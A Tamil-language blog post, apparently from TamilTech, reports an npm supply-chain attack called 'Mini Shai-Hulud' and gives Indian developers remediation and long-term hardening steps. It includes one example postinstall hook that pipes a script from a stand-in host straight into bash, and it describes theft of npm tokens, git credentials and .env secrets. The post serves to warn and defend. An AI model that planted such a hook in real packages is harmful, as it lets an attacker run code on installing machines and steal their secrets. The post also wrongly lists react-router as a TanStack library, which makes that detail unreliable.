சுருக்கம் – என்ன நடந்தது?
கடைசிப் வாரம் Mini Shai‑Hulud என்ற புதிய சப்ளை‑செயின் அட்டக்டு npm‑ல் 30‑க்கும் மேற்பட்ட பாக்கேஜ்களில் தீங்கிழைக்கும் கோடுகளை இடுகிறது. பாதிக்கப்பட்டவை mistral‑ai கிளையண்ட், பல uipath‑sdk உதவிகள், மற்றும் TanStack‑ன் முக்கிய லைப்ரரிகள் react‑router, @tanstack/query போன்றவை.
அட்டக்டு எப்படி வேலை செய்கிறது?
மாலிஷியஸ் வெர்ஷன் postinstall ஹுக்கை பயன்படுத்துகிறது. நீங்கள் npm install பண்ணும் போது, அந்த ஹுக் ஒரு ரிமோட் சர்வரிலிருந்து ஸ்கிரிப்டை curl கொண்டு டவுன்லோடு செய்து, node_modules/.bin இல் வைப்பு, பின்னர் PATH‑ல் சேர்க்கிறது. இதனால் உங்கள் எல்லா CLI‑களும் ஹேக்கர் ஆற்றலுக்கு உட்படுகின்றன.
npm install [email protected]
# package.json‑ல் malicious postinstall
"scripts": { "postinstall": "curl -s https://badguy.com/x | bash" }
இந்த ஸ்கிரிப்ட் பொதுவாக npm_token, git_credentials, .env போன்ற ரகசியங்களை திருடுகிறது.
எது பாதிக்கப்பட்டது?
mistral-ai– Mistral LLM API‑க்கு அதிகாரப்பூர்வ கிளையண்ட்.uipath‑sdk,uipath‑cli– RPA டெவலப்பர்கள் பயன்படுத்தும் உதவிகள்.react‑router(v6.15.0) – React‑ன் ரௌட்டிங் லைப்ரரி.@tanstack/query(v5.0.2) – React, Vue, Svelte‑ல் data‑fetching செய்யப் பயன்படுத்தப்படும்.- TanStack monorepo‑யின் சில சிறிய யூட்டிலிட்டிகள்.
இந்த வெர்ஷன்கள் 22 மே முதல் 28 மே 2024 வரை வெளியிடப்பட்டன. npm‑ன் பாதுகாப்பு குழு உடனே அவை நீக்கப்பட்டாலும், அந்த காலப்பகுதியில் npm install செய்த அனைவருக்கும் அபாயம் உள்ளது.
இந்த விஷயம் இந்திய டெவலப்பர்களுக்கு ஏன் முக்கியம்?
நம்மைச் சுற்றி பல ஸ்டார்ட்அப்கள் Mistral‑ஐ AI chatbot‑களுக்கு, UiPath‑ஐ RPA‑க்கு, TanStack‑ஐ SPA‑களுக்குப் பயன்படுத்துகின்றன. ஒரு ஹேக்கர் உங்கள் CI pipeline‑ல் இந்த மால்வேர் செருகியிருந்தால், அது:
- Google Cloud, AWS, Azure போன்ற கிளௌட் API‑க்களின் சிப்புகளைத் திருடும்.
- Docker image‑‑ல் ரான்சம்வேர் ஊட்டும்.
- பின்னர் கூடுதல் மால்வேரை டவுன்லோடு செய்யும் பாக்‑டோர்களை உருவாக்கும்.
இந்தப் பிழைத் தகவல், பயனர் தரவுகள், நிதி பரிவர்த்தனை மற்றும் IT சட்டத்தின் கீழ் அபராதம் ஆகியவற்றை ஏற்படுத்தலாம்.
உடனடி நடவடிக்கைகள் – என்ன செய்ய வேண்டும்?
- Lockfile‑ஐ audit செய்யுங்கள்.
npm auditஇயக்கி,[email protected],[email protected]போன்ற வெர்ஷன்களைப் பாருங்கள். - மீண்டும் clean install செய்யுங்கள்.
rm -rf node_modules package-lock.jsonசெய்து,npm installமீண்டும் இயக்கவும். - சீக்ரெட்டுகளை rotate செய்யுங்கள். அனைத்து API key‑களையும், CI‑இல் பயன்படுத்திய token‑களையும் மீண்டும் உருவாக்கவும்.
- npm‑ன் integrity check‑ஐ பயன்படுத்துங்கள். CI‑இல்
npm ci --prefer-offlineவைத்து, குற்றமற்ற பதிப்புகளே நிறுவப்படும். - Private registry அல்லது proxy பயன்படுத்துங்கள். Verdaccio, GitHub Packages போன்றவை உங்கள் நிறுவனத்திற்கு அனுமதியற்ற பாக்கேஜ்களைத் தடுக்க உதவும்.
நீண்டகால பாதுகாப்பு வழிமுறைகள்
TamilTech‑ஓட கருத்து: supply‑chain அட்டக்டுகள் இனி அரிதாக இருக்காது. உங்கள் workflow‑ல் இவை சேர்க்க வேண்டும்:
- SBOM (Software Bill of Materials) –
Syft,Dependency‑Trackபோன்ற கருவிகள் மூலம் ஒவ்வொரு dependency‑யும் பட்டியலிட்டு ஸ்கேன் செய்யுங்கள். - Package code‑signing – நம்பகமான கீயுடன் சைன் செய்யப்பட்ட npm பாக்கேஜ்கள் மட்டுமே ஏற்கவும்.
- Zero‑trust CI – Build container‑களை isolate செய்து, production secret‑களை build environment‑இல் வெளிப்படுத்த வேண்டாம்.
- Community monitoring – npm security alerts, #npm-security Slack channel‑இல் சேர்ந்து, புதிய advisory‑களை உடனே பார்க்கவும்.
அடுத்ததாக என்ன எதிர்பார்க்கலாம்?
npm security team ஏற்கனவே இந்த malicious வெர்ஷன்களை flag செய்து, maintainers‑னுடன் extra verification சேர்க்க வேலை செய்கிறது. சில நாட்களில் affected libraries‑க்கு “verified publisher” badge வரும். அதற்குள், GitHub‑இல் வரும் security‑advisory PR‑களை கவனித்து, version bump‑களை ஏற்றுக்கொள்ளுங்கள்.
இந்த சம்பவம் சொல்லும் விஷயம் – npm install என்பது ஒரு “சாதாரண” படி அல்ல. ஒவ்வொரு பாக்கேஜையும் ஒரு சாத்தியமான நுழைவு புள்ளி போலக் கருதி, AI API‑கள், RPA SDK‑கள் போன்ற உயர்‑அனுமதி கொண்ட டோக்கன்களைப் பயன்படுத்தும் போது அதிக கவனம் செலுத்த வேண்டும்.
இப்போதே lockfile‑ஐ audit செய்து, சீக்ரெட்டுகளை rotate செய்து, SBOM‑ஐ அமைக்கவும். சிறிது முயற்சி இப்போது, பின்னர் வரும் பெரிய ஓட்டத்தைத் தடுக்கும்.




கருத்துகள் (0)
Be the first to comment!